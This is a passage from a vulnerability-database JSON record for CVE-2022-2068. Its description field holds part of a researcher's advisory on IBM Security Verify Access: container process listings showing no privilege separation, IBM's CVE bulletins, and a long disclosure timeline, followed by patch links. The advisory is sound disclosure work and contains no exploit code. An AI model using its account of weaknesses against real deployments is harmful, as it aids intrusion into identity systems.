Ss Oct21 0:00 postgres: logical replication launcher\n \n www-data 547 0.3 6.2 4925056 499744 ? SLl Oct21 18:57 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/de\n \n ivmgr 761 0.0 0.5 873712 44896 ? Sl Oct21 0:04 /opt/PolicyDirector/bin/pdmgrd -foreground\n ivmgr 863 0.0 0.1 276544 8440 ? Sl Oct21 0:00 /usr/sbin/wga_servertaskd\n \n ldap 752 0.0 10.3 1314228 822572 ? Sl Oct21 0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap\n \n root 813 0.0 0.0 41984 3528 ? Ss Oct21 0:01 /usr/sbin/crond\n root 862 0.0 0.0 174348 2828 ? Ss Oct21 0:00 /usr/sbin/wga_servertaskd\n\nSome processes are running as `isam`. For example, the rsyslogd process runs as `isam`. If a program running as `isam` is compromised inside an instance, then all the programs running as `isam` are also compromised. \n\nProcesses running inside the ibmcom/verify-access-wrp:10.0.4.0 Docker image:\n\n PID USER TIME COMMAND\n 1 isam 9:42 /opt/pdweb/bin/webseald -foreground -noenv -config etc/webseald-login-internal.conf\n 32 isam 0:02 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0\n\nThe only 2 processes are both running as `isam`. 
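The check applied to these process listings can be sketched as a small parser that groups commands per user: when unrelated services (web server, LDAP, database) all resolve to a single account, compromising any one of them compromises all of them. The field layout assumed below is the BusyBox-style `PID USER TIME COMMAND` output shown above.

```python
from collections import defaultdict

# Minimal sketch: parse BusyBox-style `ps` output and group executables
# per user. A single-user result across unrelated services indicates a
# complete lack of privilege separation in the container.
def users_to_commands(ps_output: str) -> dict:
    table = defaultdict(set)
    for line in ps_output.strip().splitlines()[1:]:  # skip the header row
        fields = line.split(None, 3)  # PID USER TIME COMMAND
        if len(fields) == 4:
            pid, user, time_, command = fields
            table[user].add(command.split()[0])  # keep the executable only
    return dict(table)

if __name__ == "__main__":
    # The wrp container's process list from above:
    ps = """PID USER TIME COMMAND
1 isam 9:42 /opt/pdweb/bin/webseald -foreground -noenv -config etc/webseald-login-internal.conf
32 isam 0:02 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0"""
    table = users_to_commands(ps)
    print(sorted(table["isam"]))  # ['/opt/pdweb/bin/webseald', 'slapd']
    print(len(table) == 1)        # True: every process shares one account
```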
\n\n\nProcesses running inside the ibmcom/verify-access-runtime:10.0.4.0 Docker image:\n\n PID USER TIME COMMAND\n 1 isam 1h18 /opt/java/jre/bin/java -javaagent:/opt/ibm/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/rtprofile -Xms512m -Xmx2048m -Dcom.sun.security.enableCRLDP=true -Dsun.net.inetaddr.ttl=30 -Dhttps\n 38 isam 0:00 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0\n 63 isam 0:04 /usr/bin/postgres -D /var/postgresql/config/data\n 64 isam 0:00 postgres: logger \n 66 isam 0:00 postgres: checkpointer \n 67 isam 0:00 postgres: background writer \n 68 isam 0:00 postgres: walwriter \n 69 isam 0:01 postgres: autovacuum launcher \n 70 isam 0:05 postgres: stats collector \n 71 isam 0:00 postgres: logical replication launcher \n 37169 isam 0:00 bash\n 37186 isam 0:00 ps -a\n\nIn the `ibmcom/verify-access-runtime` instance, we can confirm the postgres daemon is running. We can also confirm a complete lack of privilege separation: everything is running as `isam`. \n\nIf a program running as `isam` is compromised inside an instance, then all the programs running as `isam` are also compromised. \n\n\n\n## Vendor Response\n\nIBM provided several security bulletins:\n\nSecurity Bulletin: IBM Security Verify Access is vulnerable to multiple Security Vulnerabilities - https://www.ibm.com/support/pages/node/7158790:\n\n- - CVE-2023-38371: IBM Security Access Manager uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. \n- - CVE-2024-35137: IBM Security Access Manager Appliance could allow a local user to possibly elevate their privileges due to sensitive configuration information being exposed. \n- - CVE-2024-35139: IBM Security Verify Access could allow a local user to obtain sensitive information from the container due to incorrect default permissions. 
\n- - CVE-2023-30998: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls. \n- - CVE-2023-30997: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls. \n- - CVE-2023-38368: IBM Security Access Manager Container could disclose sensitive information to a local user due to improper permission controls. \n- - CVE-2023-38370: IBM Security Access Manager Container, under certain configurations, could allow a user on the network to install malicious packages. \n\nSecurity Bulletin: Security Vulnerabilities discovered in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7145400:\n\n- - CVE-2024-25027: IBM Security Verify Access could disclose sensitive snapshot information due to missing encryption. \n\nSecurity Bulletin: Multiple Security Vulnerabilities were identified in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7106586:\n\n- - CVE-2023-31003: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain root access due to improper access controls. \n- - CVE-2023-31001: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) temporarily stores sensitive information in files that could be accessed by a local user. \n- - CVE-2023-38267: IBM Security Access Manager Appliance (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain sensitive configuration information. 
\n- - CVE-2023-31005: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a local user to escalate their privileges due to an improper security configuration. \n- - CVE-2023-30999: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow an attacker to cause a denial of service due to uncontrolled resource consumption. \n- - CVE-2023-43016: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote user to log into the server due to a user account with an empty password. \n- - CVE-2023-32327: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. \n- - CVE-2023-32329: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a user to download files from an incorrect repository due to improper file validation. \n- - CVE-2023-31004: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote attacker to gain access to the underlying system using man in the middle techniques. 
\n- - CVE-2023-31006: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to a denial of service attacks on the DSC server. \n- - CVE-2023-32328: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure protocols in some instances that could allow an attacker on the network to take control of the server. \n- - CVE-2023-32330: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure calls that could allow an attacker on the network to take control of the server. \n- - CVE-2023-43017: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 could allow a privileged user to install a configuration file that could allow remote access. \n- - CVE-2023-31002: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 temporarily stores sensitive information in files that could be accessed by a local user. \n- - CVE-2023-38369: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 does not require that docker images should have strong passwords by default, which makes it easier for attackers to compromise user accounts. \n\nSecurity Bulletin: Multiple Security Vulnerabilities were discovered in IBM Security Verify Access Container (CVE-2024-35140, CVE-2024-35141, CVE-2024-35142) - https://www.ibm.com/support/pages/node/7155356:\n\n- - CVE-2024-35140: IBM Security Verify Access could allow a local user to escalate their privileges due to improper certificate validation. \n- - CVE-2024-35141: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges. \n- - CVE-2024-35142: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges. \n\n\n\n## Report Timeline\n\n* October 2022: Security assessment performed on IBM Security Verify Access. \n* Feb 12, 2023: A complete report was sent to IBM. 
\n* Feb 13, 2023: IBM acknowledged the reception of the security assessment and said that scan tools usually report a lot of issues so I have to check the status of detected CVEs by browsing RedHat webpages and create an issue for each CVE. \n* Feb 13, 2023: Replied to IBM saying that the security assessment was not done using a scanner. \n* Feb 14, 2023: Asked for an update. \n* Feb 14, 2023: IBM confirmed that the report was shared with L3 and \"IBM hacking team\". \n* Feb 22, 2023: IBM said they were still assessing the report. \n* Mar 13, 2023: An additional report on ibmsecurity was sent to IBM. \n* Mar 13, 2023: IBM confirmed that the second report was shared with L3 team. \n* Mar 15, 2023: IBM wanted to organize a meeting about the findings. \n* Mar 15, 2023: I replied that I would like to have a written feedback for each reported vulnerability in order to have constructive discussion. \n* Apr 4, 2023: I asked again IBM to confirm the vulnerabilities\n* Apr 5, 2023: IBM shared the analysis (VulnerabilityResponse.xlsx), confirming several vulnerabilities. \n* Apr 11, 2023: I provided my comments (VulnerabilityResponse-comments-Pierre.xlsx) and asked to organize a meeting. \n* Apr 11, 2023: IBM confirmed a meeting is possible. \n* Apr 18, 2023: I asked to organize a meeting on Apr 19, 2023. \n* Apr 18, 2023: IBM confirmed a meeting is possible. \n* Apr 19, 2023: I asked to have a meeting where every party (dev team, support and myself) can be present. \n* Apr 19, 2023: IBM confirmed a meeting would take place on Apr 20, 2023. \n* Apr 20, 2023: Meeting with IBM regarding ISVA. IBM confirmed they would recheck some of the issues and would provide CVEs for the vulnerabilities. \n* Apr 23, 2023: I asked to have a second meeting about ibmsecurity. \n* Apr 23, 2023: IBM confirmed they will organize a meeting on ibmsecurity. \n* Apr 24, 2023: I asked the timeline to get security patches. \n* Apr 24, 2023: IBM confirmed there are no ETA to get security patches. 
\n* Apr 27, 2023: Meeting with IBM regarding ibmsecurity. IBM confirmed they will fix all the issues. \n* May 10, 2023: I asked for CVE identifiers to track the vulnerabilities. \n* May 11, 2023: IBM said that PSIRT records have been opened and the scoring is in progress. \n* May 15, 2023: I reached IBM because I found a CVE (CVE-2023-25927) and a security bulletin likely corresponding to a vulnerability I reported, thanks to @CVEnew on Twitter: https://www.ibm.com/support/pages/node/6989653. I asked if this was one of the reported vulnerabilities. \n* Jul 7, 2023: IBM said the dev team was still working on the final list of issues and that everything would be fixed in the 10.0.7 release. \n* Jul 10, 2023: I asked when the 10.0.7 release would be available. I asked again more details about the previous advisory. \n* Jul 11, 2023: IBM said that the 10.0.7 release would be published on Dec 23, 2023. Regarding the CVEs, IBM replied they would need to discuss with the dev team. \n* Jul 12, 2023: I asked IBM to confirm if CVE-2023-25927 was one of the reported vulnerabilities. \n* Jul 12, 2023: IBM said that they do not credit security researchers. \n* Jul 13, 2023: I provided several IBM security bulletins where security researchers were credited, e.g. https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430. \n* Jul 14, 2023: IBM confirmed that they would forward the information to L3 team and asked what I would want to do with this case. \n* Jul 14, 2023: I said that (1) I was still waiting for information about CVE-2023-25927, (2) I did not have any information regarding security patches for ibmsecurity and (3) I asked IBM to provide me with the final list of vulnerabilities that would be patched in the 10.0.7. Since the list of confirmed vulnerabilities was quite long, I wanted to confirm that nothing was missed. 
\n* Jul 28, 2023: IBM said that they did not know if CVE-2023-25927 was one of the reported vulnerabilities and that, in any case, it was impossible to edit the security bulletin and give credits. \n* Aug 16, 2023: IBM asked if additional assistance was required [NB: IBM likely wanted to close this ticket while no security patches were published]. \n* Aug 17, 2023: I again asked for information about ibmsecurity and CVE-2023-25927. \n* Oct 20, 2023: IBM said they were still analysing the requests (final list of patched vulnerabilities, security patches of ibmsecurity and status of CVE-2023-25927). \n* Oct 25, 2023: IBM asked to organize a meeting. \n* Oct 25, 2023: I replied that I was still waiting for the final list of vulnerabilities that would be fixed in version 10.0.7. There was also no information regarding security patches for ibmsecurity. \n* Oct 25, 2023: IBM replied they wanted to discuss the vulnerabilities in a meeting. \n* Oct 29, 2023: IBM asked to organize a meeting again. \n* Oct 30, 2023: I accepted the meeting and asked IBM to provide the list of vulnerabilities that would be patched, with their current status. I also asked for the status of ibmsecurity. \n* Oct 30, 2023: IBM asked to have a meeting on Nov 7, 2023. \n* Nov 2, 2023: I confirmed my presence at the meeting. \n* Nov 5, 2023: IBM confirmed the meeting. \n* Nov 7, 2023: Meeting with IBM. IBM provided me with a new report containing new feedback for several vulnerabilities. IBM also confirmed that several vulnerabilities would be patched in 2024 and that ibmsecurity would be patched in December 2023. IBM asked me to review a specific vulnerability that appeared to be invalid (_V-[REDACTED] - Insecure SSLv3 connections to the DSC servers_). \n* Nov 21, 2023: IBM asked me to review the new report shared by IBM. \n* Nov 28, 2023: IBM asked for updates. 
\n* Dec 4, 2023: I answered that I no longer had access to the test infrastructure and that IBM had to wait for my analysis until I regained access to it. \n* Dec 4, 2023: IBM asked me to check the vulnerabilities as soon as possible. \n* Dec 21, 2023: I got access to a test infrastructure and reviewed some vulnerabilities. \n* Dec 21, 2023: I sent a new analysis to IBM, containing details of 4 vulnerabilities. \n* Dec 27, 2023: IBM confirmed the reception of the new analysis. \n* Jan 15, 2024: IBM asked me to update ISVA and recheck all the vulnerabilities. \n* Jan 16, 2024: I asked IBM if ibmsecurity was also patched. \n* Jan 16, 2024: IBM confirmed that a new case must be opened for ibmsecurity to get security patches(!). \n* Jan 22, 2024: IBM wanted to organize a new meeting. \n* Jan 22, 2024: I replied that I failed to understand the issue with the ibmsecurity library and that I had a written confirmation by IBM that security patches would be provided. The vulnerabilities found in ibmsecurity were reported in March 2023 (10 months earlier). \n* Jan 22, 2024: I informed IBM that I discovered(!) a new security bulletin thanks to @CVEnew: https://www.ibm.com/support/pages/node/7106586, but only 15 vulnerabilities were listed instead of the 35 vulnerabilities confirmed by IBM. I asked IBM to clarify the situation as it looked like less than half of the vulnerabilities were indeed patched. \n* Jan 24, 2024: IBM created a new case for ibmsecurity. \n* Jan 29, 2024: IBM confirmed that 5 vulnerabilities had not been patched in the latest version (10.0.7). \n* Jan 29, 2024: I reached IBM to get the status of 15 unpatched vulnerabilities. I provided the updated analysis to IBM. \n* Feb 7, 2024: IBM confirmed that some of the vulnerabilities were "being processed" and that some of the vulnerabilities had also been silently patched without any security bulletins being published. \n* Feb 20, 2024: IBM asked for updates. 
\n* Feb 20, 2024: I asked for the release date of ISVA 10.0.8 and the complete list of vulnerabilities that would be patched in this release. \n* Feb 20, 2024: IBM confirmed that the 10.0.8 release would be published in mid-2024. \n* Feb 23, 2024: I sent a new vulnerability to IBM: "Authentication Bypass on IBM Security Verify Runtime". \n* Feb 23, 2024: IBM confirmed the reception of the vulnerability and asked to close the ticket. \n* Feb 23, 2024: I said that since some vulnerabilities had not been patched, the ticket must stay open. \n* Feb 23, 2024: IBM said that they could not keep the ticket open and needed to close it. \n* Feb 23, 2024: I explained that the vulnerabilities were reported over a year ago, that IBM confirmed they had not been fully fixed in the latest version, and that some vulnerabilities were also still under evaluation. I said that I would agree to close this ticket if IBM could confirm that all vulnerabilities reported in the ticket had been correctly fixed in the latest version. I also asked IBM to provide the corresponding security bulletins. \n* Feb 27, 2024: Regarding the authentication bypass, IBM replied that the runtime was supposed to be in the intranet zone. \n* Feb 28, 2024: I asked IBM to clarify where the documentation specified that the runtime should not be exposed. For example, https://www.ibm.com/docs/en/sva/10.0.7?topic=support-docker-image-verify-access-runtime did not explain that exposing this runtime on the network was a high security risk. \n* Mar 4, 2024: Regarding the vulnerabilities found in ibmsecurity, IBM said that any security vulnerability found in ibmsecurity must be reported by opening an issue in the Github repository. \n* Mar 8, 2024: IBM confirmed they were able to reproduce the authentication bypass vulnerability. 
\n* Mar 12, 2024: IBM confirmed they would add optional mTLS authentication in the next release (10.0.8) and would update the ISVA documentation to block any attempt at the authentication bypass vulnerability. \n* Mar 29, 2024: IBM published a new security bulletin: https://www.ibm.com/support/pages/node/7145400. \n* Mar 29, 2024: IBM confirmed that any security vulnerability found in ibmsecurity must be reported by opening an issue in the GitHub repository. \n* Apr 1, 2024: Creation of https://github.com/IBM-Security/ibmsecurity/issues/416. \n* Apr 2, 2024: IBM confirmed the reception of the report https://github.com/IBM-Security/ibmsecurity/issues/416#issuecomment-2032110397. \n* Apr 3, 2024: https://github.com/IBM-Security/ibmsecurity/issues/416 was entirely redacted by IBM. \n* Apr 5, 2024: I asked if the vulnerabilities would be patched in the #416 issue (https://github.com/IBM-Security/ibmsecurity/issues/416). \n* Apr 6, 2024: Issue #416 (https://github.com/IBM-Security/ibmsecurity/issues/416) was closed. \n* Apr 6, 2024: I re-added the content of https://github.com/IBM-Security/ibmsecurity/issues/416 and asked if CVEs would be published. \n* Apr 10, 2024: Security bulletin for ibmsecurity published: https://www.ibm.com/support/pages/node/7147932. \n* Apr 10, 2024: I contacted IBM regarding a new security bulletin that appeared to cover a vulnerability I reported: https://www.ibm.com/support/pages/node/7145828. \n* Apr 10, 2024: IBM said this security bulletin was unrelated to the vulnerabilities I reported. \n* Apr 15, 2024: IBM confirmed that the final vulnerabilities would be fixed in ISVA 10.0.8. \n* Apr 15, 2024: I provided a list of unfixed vulnerabilities and asked for more information. \n* Apr 16, 2024: IBM confirmed that all the unfixed vulnerabilities would be fixed in ISVA 10.0.8 and asked to close the ticket. \n* Apr 16, 2024: I confirmed that the ticket could be closed only when the security patches were available. 
\n* Apr 16, 2024: IBM confirmed they wanted to close the ticket because nothing would be updated before mid-2024. \n* Apr 17, 2024: I replied that \"It makes no sense to close this ticket until the vulnerabilities have been fixed. The fact that the vulnerabilities are fixed mid-year is a decision made by IBM. IBM was made aware of these vulnerabilities over a year ago, and yet we are still waiting for security patches. If this ticket is closed, I would consider that the vulnerabilities have been fixed and it is perfectly fine to publish the technical analysis.\"\n* May 6, 2024: IBM closed the existing ticket and opened new tickets for the remaining vulnerabilities. \n* May 6, 2024: I contacted IBM PSIRT asking if it was fine to publish the vulnerabilities since the ticket had been closed by IBM. \n* May 7, 2024: I reopened the ticket, stating that some of the patched vulnerabilities had not received a CVE and that some vulnerabilities remained unpatched. I asked IBM to provide me with the CVE assigned to each vulnerability. I also asked IBM to confirm that, since the ticket had been closed by IBM, all the vulnerabilities had been fixed and I would be able to publish the technical details. \n* May 8, 2024: IBM said they would review the list of vulnerabilities. \n* May 10, 2024: IBM PSIRT asked me not to publish technical details of unpatched vulnerabilities. \n* May 17, 2024: IBM provided me with an incomplete list of CVEs, with different vulnerabilities grouped under the same CVE identifier, and asked to close the ticket. \n* May 20, 2024: IBM asked for my comments on the list of CVEs. \n* May 20, 2024: I confirmed that several CVEs were missing and the list was incomplete. \n* May 21, 2024: IBM provided me with an explanation regarding the missing CVEs. \n* May 21, 2024: I asked IBM to quote their explanation in the security advisory. \n* May 21, 2024: IBM asked to have a meeting. 
\n* May 22, 2024: I replied that I would prefer written communication since it was very difficult to track the status of the vulnerabilities with (1) CVEs obtained only several months after the release of security bulletins, (2) tickets closed by IBM for unpatched vulnerabilities, (3) vulnerabilities in ibmsecurity which could be corrected by IBM and which could then no longer be managed by IBM, and (4) missing CVEs. \n* May 22, 2024: IBM asked to have a meeting to remove any confusion. \n* May 23, 2024: I replied that there was not much confusion apart from missing CVEs for silently patched vulnerabilities and a lack of communication from IBM when releasing security patches. I asked IBM to share the CVEs with the corresponding vulnerabilities and to indicate the security bulletins with the list of corresponding vulnerabilities. \n* May 24, 2024: IBM stated they would provide me with additional CVEs. \n* May 30, 2024: I confirmed that the creation of additional CVEs was fair. \n* Jun 2, 2024: IBM confirmed 3 new CVEs in a new security bulletin: https://www.ibm.com/support/pages/node/7155356. \n* Jun 3, 2024: I asked IBM for the release date of the 10.0.8 version. \n* Jun 3, 2024: IBM confirmed that the exact date was not yet decided. \n* Jun 6, 2024: IBM asked if I had comments about the remaining vulnerabilities. \n* Jun 8, 2024: I asked IBM about the status of a supposedly patched vulnerability. \n* Jun 10, 2024: IBM confirmed that this vulnerability had not been previously patched and would be patched in the 10.0.8 release. \n* Jun 11, 2024: IBM asked me to create separate cases for the remaining vulnerabilities. \n* Jun 19, 2024: IBM asked if I needed assistance. \n* Jun 23, 2024: IBM confirmed that the 10.0.8 version had been released and that they would close the ticket tracking the vulnerabilities. \n* Jun 26, 2024: I asked IBM to provide the corresponding CVEs and the link to the security bulletin. 
\n* Jun 27, 2024: IBM provided me with the link to the security bulletin: https://www.ibm.com/support/pages/node/7158790 and said that the 10.0.8 version had been released with all the vulnerabilities patched. IBM closed the ticket. \n* Jul 3, 2024: I reopened the ticket and asked IBM to provide me with the list of vulnerabilities and the corresponding CVEs, since I was not able to correctly map the CVEs to the vulnerabilities I reported. \n* Jul 8, 2024: IBM provided me with the list of CVEs. IBM closed the ticket. \n* Sep 7, 2024: I sent an email to IBM PSIRT stating that I was going to publish the security advisory and that some CVEs were still missing. I also stated that CVE-2023-38371 seemed to be an error, since it had been confirmed not to be a vulnerability in our previous email exchanges. \n* Sep 9, 2024: I asked IBM to provide me with an official link regarding the runtime authentication bypass, to publish it in the security advisory. \n* Sep 13, 2024: IBM PSIRT provided me with (1) links regarding the runtime authentication bypass and (2) additional CVEs. They also confirmed that at least one vulnerability was not fixed and asked me not to disclose this finding until it was patched. No information was provided on when this vulnerability would be patched. \n* Nov 1, 2024: This security advisory was published. \n\n\n\n## Credits\n\nThese vulnerabilities were found by Pierre Barre aka Pierre Kim (@PierreKimSec). 
\n\n\n\n## References\n\nhttps://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html\n\nhttps://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt\n\nhttps://pierrekim.github.io/blog/2024-11-01-ibmsecurity-4-vulnerabilities.html\n\nhttps://pierrekim.github.io/advisories/2024-ibmsecurity.txt\n\nhttps://www.ibm.com/support/pages/node/7106586\n\nhttps://www.ibm.com/support/pages/node/7145400\n\nhttps://www.ibm.com/support/pages/node/7155356\n\nhttps://www.ibm.com/support/pages/node/7158790\n\n\n\n## Disclaimer\n\nThis advisory is licensed under a Creative Commons Attribution Non-Commercial\nShare-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/\n\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmckrf4ACgkQxD4O2n2T\nLbzphQ//dkcrCH8Q+yNrjdYoxvY/wXwc1JfgXxmLK7Ns3N5qFJVT70Uea6HjIoHz\neJQurricioTP8jG48J2uzIt7l4G4Kgv0zP+aPN/KXjfYghu46N4G29458OgXTHVe\necOmouy/za1DG6qtST+sbicDhX5oku4VtdQ+NtDXaoLUAkADp/wJ3rLv5Fdw7gxQ\nVR0OMUTsy50Vv1bRN2R77ZAs/odAY67pQfTw8QpKLDDLBZveeAwBLgc66rQ+KZjq\nmPbLUULFlZp3+EYnR+XyZXu2nNGZDhTVMKAYCGzuqr3/boIz1BF7rifK07tL8+EE\n+NQQK3kzauWuQ/Sl5X20kfvdC91g7d/G93Me+Uz9iSfB9cyDfAdCLNf6fyYi/xjE\nqz6HNe2capSG7GBeCK6Q8ffb95kojjKrmyL2eKj2Yz5ZCWuDXa0L6pLwHZ9KSyjj\n24kykmiHI4bCKBCXazBVYcdguk+6PCcenAGxLIpKdmTcMvaUUbN/c2jUenjV8/As\n+akcA48mNjuITE+Qei9kn7R5huTSCZffws9j4r0P86dst0ZkYfNSWgThatk2NRwC\nV8D2DOXdxpXThuOAMfN4b9ViLYTeHm2/JGvl0RLQNyNSv2rWeeEch6Z69NsS/Fq7\nY7L55juYeCFtkTrdYA+tkaUHlvX8uQC9GoKkcUOfYV6utGQ4fnU=\n=3Ax6\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-2068"
},
{
"db": "VULMON",
"id": "CVE-2022-2068"
},
{
"db": "PACKETSTORM",
"id": "168022"
},
{
"db": "PACKETSTORM",
"id": "169396"
},
{
"db": "PACKETSTORM",
"id": "168112"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170196"
},
{
"db": "PACKETSTORM",
"id": "170165"
},
{
"db": "PACKETSTORM",
"id": "175432"
},
{
"db": "PACKETSTORM",
"id": "170179"
},
{
"db": "PACKETSTORM",
"id": "182466"
}
],
"trust": 1.8
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-2068",
"trust": 2.0
},
{
"db": "SIEMENS",
"id": "SSA-332410",
"trust": 1.1
},
{
"db": "ICS CERT",
"id": "ICSA-22-319-01",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-2068",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168022",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169396",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168112",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170741",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170196",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170165",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "175432",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170179",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "182466",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-2068"
},
{
"db": "PACKETSTORM",
"id": "168022"
},
{
"db": "PACKETSTORM",
"id": "169396"
},
{
"db": "PACKETSTORM",
"id": "168112"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170196"
},
{
"db": "PACKETSTORM",
"id": "170165"
},
{
"db": "PACKETSTORM",
"id": "175432"
},
{
"db": "PACKETSTORM",
"id": "170179"
},
{
"db": "PACKETSTORM",
"id": "182466"
},
{
"db": "NVD",
"id": "CVE-2022-2068"
}
]
},
"id": "VAR-202206-1428",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.416330645
},
"last_update_date": "2026-03-09T20:23:37.685000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Debian Security Advisories: DSA-5169-1 openssl -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=6b57464ee127384d3d853e9cc99cf350"
},
{
"title": "Amazon Linux AMI: ALAS-2022-1626",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2022-1626"
},
{
"title": "Debian CVElist Bug Report Logs: openssl: CVE-2022-2097",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=740b837c53d462fc86f3cb0849b86ca0"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2022-2068"
},
{
"title": "Amazon Linux 2: ALAS2-2022-1832",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1832"
},
{
"title": "Amazon Linux 2: ALAS2-2022-1831",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1831"
},
{
"title": "Amazon Linux 2: ALASOPENSSL-SNAPSAFE-2023-001",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALASOPENSSL-SNAPSAFE-2023-001"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-2068"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.7.1 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228917 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.7.1 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228913 - Security Advisory"
},
{
"title": "Red Hat: Moderate: openssl security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225818 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Satellite Client security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20235982 - Security Advisory"
},
{
"title": "Red Hat: Moderate: openssl security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226224 - Security Advisory"
},
{
"title": "Red Hat: Important: Release of containers for OSP 16.2.z director operator tech preview",
"trust": 0.1,
